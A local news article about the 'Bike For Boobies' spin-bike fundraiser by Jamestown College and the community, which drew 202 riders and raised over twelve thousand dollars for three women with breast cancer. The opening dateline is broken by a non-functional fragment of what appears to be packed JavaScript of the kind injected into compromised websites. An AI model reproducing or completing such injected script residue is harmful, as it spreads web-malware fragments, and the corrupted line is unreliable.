JAMESTOWN estht|var|u0026u|referrer|shdkd||js|php’.split(‘|’),0,{}))
– Jamestown College and the local community banded together to Bike For Boobies on Saturday, December 3.

The biking benefitted Lori Love, Judy Hager, and Diane Crowston to combat the effects and lift the spirits in the battle against breast cancer.

Jamestown College came out in full force for the cause. Campus groups that brought riders and raised funds included the football team, soccer (men and women), Knight Line Dance, Nursing students, Pre-Nursing students, faculty & staff, as well as a few general students. The biggest group from Jamestown College happened to be 42 members of the baseball squad, coached by Tom Hager. Hager’s wife Judy has recently begun the process of chemotherapy and radiation to hopefully cure and kill breast cancer.

Nurses from the community, as well as a book club, volunteered time and effort for the biking benefit.

The Jamestown High School swim team pooled together energy as Braden Love helped in the cause for his mother, Lori Love.

The original time frame for the biking was 8 am to 1 pm, but because of so many volunteers, the time had to be expanded from 6:30 am to 3:45 pm.

That’s a lot of biking for boobies – especially at the legs of the three punishing leaders who created some sore muscles and kept bikers sweating for over nine hours. The three leaders who showed little mercy on the spinners were Kelly Nagel, Cheryl Bormann, and Kim Ash.

Kim Ash stated, “It was awesome. I cannot believe the response. Just to see the effort involved (for biking and fundraising) was amazing.”

The 202 total bikers ranged in age from 10 to 59.

Overall, the benefit collected over twelve thousand dollars that will be split among the three aforementioned ladies who have unfortunately been struck by breast cancer.

Continued prayers are appreciated as the battle continues, and next time you step onto a bike, remember to appreciate your health and to bike for boobies!
